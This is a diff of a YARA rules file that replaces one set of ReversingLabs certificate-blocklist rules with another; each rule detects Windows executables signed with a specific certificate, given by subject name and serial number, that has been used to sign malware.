-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6348-L6366"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L441-L457"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1255cef74082c9cad41ac8e7d62e740f69e6ba44171bb45655a68ee5db204e57"
+		logic_hash = "3c1ed012716f36876d9375838befb9821b87cafc6aca57a0f18392f80f5ba325"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15917,21 +38311,21 @@ rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and ( pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" or pe.signatures [ i ] . serial == "b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" ) and 1603328400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Porral Twinware S.L.L." and pe.signatures [ i ] . serial == "09:4b:f1:9d:50:9d:30:74:91:39:95:16:0b:19:5b:6c" and 1373241599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A77Cf3Ba49B64E6Cbe5Fb4A6A6Aacc6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3e451a5a-835b-572d-ab17-ff52d3614a86"
+		id = "4fb06917-ccbd-514c-a936-e337c31c6e65"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6368-L6386"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L459-L475"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f560e6f4a65eaac8db1d8accb0748de17048e66ccf989468e6350a3ec1d70dc8"
+		logic_hash = "3bebc4a36b57526505167d8f075d468e4775d66c81ce08644c506d9be94efba0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15941,21 +38335,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and ( pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" or pe.signatures [ i ] . serial == "ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" ) and 1603369254 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "I.ST.SAN. Srl" and pe.signatures [ i ] . serial == "0a:77:cf:3b:a4:9b:64:e6:cb:e5:fb:4a:6a:6a:ac:c6" and 1371081599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1F4C22Da1107D20C1Eda04569D58E573 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4fcd4e89-658c-593b-8f94-edd5df19da6e"
+		id = "4ff75d18-926e-51aa-8e1c-b9699669bbd0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6388-L6404"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L477-L493"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9f1cc61b944974696113912bc1d1a0b45b9911fa4d6de382a48c0d22d2d20953"
+		logic_hash = "fe19c4b21c3b70ec571461ca6d9c370a971c01f2d68e3c3916aa1fa0f13b20f8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15965,21 +38359,21 @@ rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hillcoe Software Inc." and pe.signatures [ i ] . serial == "01:4a:98:d6:97:b4:4f:43:de:d2:1f:18:eb:6a:d0:ba" and 1605364760 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PlanView, Inc." and pe.signatures [ i ] . serial == "1f:4c:22:da:11:07:d2:0c:1e:da:04:56:9d:58:e5:73" and 1366156799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fe68D48634893D18De040D8F1C289D2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0169cf47-72b0-53ec-bc8f-c2a80febad3a"
+		id = "40aed582-2960-5b42-acde-7350a2595b4b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6406-L6422"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L495-L511"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "19f11e1d9ce95eb4bc75387a0118c230388a13cd07b02e00ea1d65cdcc0b2bd7"
+		logic_hash = "41feebc8800a084ac369b5c5721b1362d371bd503b67823986bad2839157a4b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15989,21 +38383,21 @@ rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" and 1605712706 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xinghua Yile Network Tech Co.,Ltd." and pe.signatures [ i ] . serial == "4f:e6:8d:48:63:48:93:d1:8d:e0:40:d8:f1:c2:89:d2" and 1371081600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6767Def972D6Ea702D8C8A53Af1832D3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d7fd0c3f-0292-5d27-b8e6-559b829440b4"
+		id = "c60497b4-5abe-52b0-aac9-88953ea6cdf1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6424-L6442"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L513-L529"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d82220d908283f1707ec15882503b02cb8dc80095279a9e7d6cbdd113c25d8ae"
+		logic_hash = "aa7f997449b4b8dcf488cfb7f45ee98ca540d39fb861f5b01ff4bb4aa1875b72"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16013,21 +38407,21 @@ rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and ( pe.signatures [ i ] . serial == "00:1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" or pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" ) and 1601733106 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou typical corner Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "67:67:de:f9:72:d6:ea:70:2d:8c:8a:53:af:18:32:d3" and 1361750400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06477E3425F1448995Ced539789E6842 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e96fdf57-3884-526e-a704-93e783c95241"
+		id = "21da6056-bf4e-5fc4-bef5-37010ebe8f05"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6444-L6460"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L531-L547"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "691fadaa653ecd29e60f2db39b7c5154d7c85f388f72eccd0a4b5fe42eaee0dd"
+		logic_hash = "c0bc7808bb6bcc8273a887203c1b47d1a49fcb7719863e6bc97b5c7404a254f7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16037,21 +38431,21 @@ rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbor LLC" and pe.signatures [ i ] . serial == "75:cf:72:9f:8a:74:0b:bd:ef:18:3a:1c:4d:86:a0:2f" and 1604223894 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karim Lammali" and pe.signatures [ i ] . serial == "06:47:7e:34:25:f1:44:89:95:ce:d5:39:78:9e:68:42" and 1334275199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0450A7C1C36951Da09C8Ad0E7F716Ff2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "de9ef02d-a723-5013-9f91-e394edc23855"
+		id = "b4a56bbe-f2ba-52df-832d-35b92ab73683"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6462-L6478"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L549-L565"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f9f1f629e03563ece0fe5186b199e2f030dce7f58fb259de1aeb7387c76fa902"
+		logic_hash = "cb594607ceef1b8d79145ad3905fb2c38d2ed3f3e6c8a0a793fc2dc9d0a21855"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16061,21 +38455,21 @@ rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGANICUP ApS" and pe.signatures [ i ] . serial == "2f:64:67:72:54:d3:84:4e:fd:ac:29:22:12:3d:05:d1" and 1605640092 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PS Partnership" and pe.signatures [ i ] . serial == "04:50:a7:c1:c3:69:51:da:09:c8:ad:0e:7f:71:6f:f2" and 1362182399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F9Fbdab9B39645Cf3211F87Abb5Ddb7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "22bd8590-7a95-564c-ad77-fb20569de51d"
+		id = "ad24d2e9-ae3d-5fae-b58d-965bd1de2a99"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6480-L6496"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L567-L583"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "73d80e6a0dc2316524a55a9627792b9b4488d238ef529f1767de182956b0865e"
+		logic_hash = "ba5885c7769b5ead261815880033b0df50dc4f7684fdb37398ab01bfebda0e37"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16085,21 +38479,21 @@ rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" and 1598255906 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "The Motivo Group, Inc." and pe.signatures [ i ] . serial == "0f:9f:bd:ab:9b:39:64:5c:f3:21:1f:87:ab:b5:dd:b7" and 1361318399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4211D2E4F0E87127319302C55B85Bcf2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8751f71b-0ebb-5820-927c-684a5ae5ee7b"
+		id = "dbe2a945-cf13-564a-a95a-24534c70a723"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6498-L6516"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L585-L601"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2923979811504f78a79a2480600285a2697845e51870a44ed231a81e79807121"
+		logic_hash = "edf9bbface7fe943dfa4f5a6e8469802ccdbd3de9d3e6b8fabebb024c21bb9a9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16109,21 +38503,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and ( pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" or pe.signatures [ i ] . serial == "ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" ) and 1605358307 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "yinsheng xie" and pe.signatures [ i ] . serial == "42:11:d2:e4:f0:e8:71:27:31:93:02:c5:5b:85:bc:f2" and 1360713599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07B44Cdbfffb78De05F4261672A67312 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2564461-6731-5d7b-8dbb-560929b568d0"
+		id = "18787692-1233-5ea8-869c-feb530d06237"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6518-L6536"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L603-L619"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2a3353c655531b113dc019a86288310881e3bbcb6c03670a805f22b185e09e6c"
+		logic_hash = "c88a8543782fc49d8aa68f3fc8052bd3316d10118dfb2ef2eef5006de657b6f1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16133,21 +38527,21 @@ rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "212 NY Gifts, Inc." and ( pe.signatures [ i ] . serial == "00:11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" or pe.signatures [ i ] . serial == "11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" ) and 1605515909 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Paper Comercial Ltda" and pe.signatures [ i ] . serial == "07:b4:4c:db:ff:fb:78:de:05:f4:26:16:72:a6:73:12" and 1359503999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F8B9A1Ba5E60C754Dbb40Ddee7905E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cd643ad5-254a-5c53-a6f2-b263ff539cd3"
+		id = "9b6ba6bb-a796-59e1-a38b-04d4b60a99a6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6538-L6556"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L621-L637"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4242ef4a30bb09463ec5a6df9367915788a2aa782df6c463bcf966d2aad63c1d"
+		logic_hash = "2a0d07d47cd41db5dc170a29607b6c1f2e3b7c0785f83b211f68f9cb9368e350"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16157,21 +38551,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOMATIC d.o.o." and ( pe.signatures [ i ] . serial == "00:5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" or pe.signatures [ i ] . serial == "5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" ) and 1605006199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOX Entertainment Co., Ltd" and pe.signatures [ i ] . serial == "4f:8b:9a:1b:a5:e6:0c:75:4d:bb:40:dd:ee:79:05:e2" and 1348617599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A389B95Ee736Dd13Bc0Ed743Fd74D2F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "85df653a-a4a3-5d0e-86f4-cad0249cd3d3"
+		id = "43cce248-2322-5607-8706-aeab046a30b9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6558-L6576"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L639-L655"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c77881e0365c9fc398097d0b6e077330a5f0fcbb53279bfde96b3c01df914c55"
+		logic_hash = "8b83e4aa47cea7cadf4b4a9f4e044478a62f4233e082fb52f9ed906d80a552aa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16181,21 +38575,21 @@ rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and ( pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" or pe.signatures [ i ] . serial == "82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" ) and 1605117874 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BUSTER ASSISTENCIA TECNICA ELETRONICA LTDA - ME" and pe.signatures [ i ] . serial == "0a:38:9b:95:ee:73:6d:d1:3b:c0:ed:74:3f:d7:4d:2f" and 1351814399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1A3Faaeb3A8B93B2394Fec36345996E6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4446aead-9505-545a-8d3a-6ad844d348d3"
+		id = "343e4dbe-21a6-5758-be81-e5e7918c54fa"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6578-L6596"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L657-L673"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "803d70dddeff51b753b577ea196b12570847c6875ae676a2d12cf1ca9323be34"
+		logic_hash = "a3bd9aaba8dbdb340b5d3013684584524eb08b11339985ba6ca0291b8c8bc692"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16205,21 +38599,21 @@ rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AI Software a.s." and ( pe.signatures [ i ] . serial == "00:9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" or pe.signatures [ i ] . serial == "9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" ) and 1592442000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "salvatore macchiarella" and pe.signatures [ i ] . serial == "1a:3f:aa:eb:3a:8b:93:b2:39:4f:ec:36:34:59:96:e6" and 1468454400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1A35Acce5B0C77206B1C3Dc2A6A2417C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6b992971-6a1f-53e3-8651-f25a6b761c41"
+		id = "0e42ffb8-07f2-55e4-977d-7760e923d76d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6598-L6616"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L675-L691"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bd198665ae952e11c91adc329908e3cd55a55365875200cd81d2f71fd092f1fe"
+		logic_hash = "ce161fdd511e0efa042516ead09c6ab5f8dcf54f2087cdccbfed8e7cdfbd25b2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16229,21 +38623,21 @@ rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE
 		importance = 25
 
 	condition:
